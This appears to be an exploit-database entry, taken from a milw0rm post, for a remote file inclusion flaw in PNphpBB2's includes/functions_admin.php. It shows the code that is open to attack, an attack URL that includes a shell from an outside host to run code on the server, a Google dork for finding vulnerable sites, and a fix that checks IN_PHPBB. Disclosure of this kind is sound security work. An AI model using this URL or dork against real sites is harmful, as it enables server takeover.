header-logo
Suggest Exploit
vendor:
PNphpBB2
by:
Unknown
N/A
CVSS
HIGH
Remote Code Execution
Not mentioned
CWE
Product Name: PNphpBB2
Affected Version From: Not mentioned
Affected Version To: Not mentioned
Patch Exists: NO
Related CWE: Not mentioned
CPE: Not mentioned
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned
2006

ZeroDay Smile

The vulnerability exists in the includes/functions_admin.php file of the PNphpBB2 forum software. By manipulating the phpbb_root_path parameter in a specific URL, an attacker can include a remote shell and execute arbitrary code on the server. This vulnerability allows for remote code execution.

Mitigation:

To fix the vulnerability, add the provided code before the include statement in the vulnerable file. The code checks if the IN_PHPBB constant is defined and terminates the execution if not, preventing the exploit from being triggered.
Source

Exploit-DB raw data:

Yeah, another ZeroDay Smile

Vendor: http://www.pnphpbb.com/

Vulnerable File: includes/functions_admin.php

Vulnerable Code:

//The phpbb_root_path isn't initialize

include_once( $phpbb_root_path . 'includes/functions.' . $phpEx );

Method To Use:

http://www.victim.com/[pn_phpbb]/includes/functions_admin.php?phpbb_root_path=http://yourdomain.com/shell.txt?

How To Fix:

Add this code before the include
Code:
if ( !defined('IN_PHPBB') )
{
   die("Hacking attempt");
}


Google Dork: Powered by PNphpBB2 / Powered por PNphpBB2

# milw0rm.com [2006-09-18]

Navigation

Suggest Exploit

Services By CQR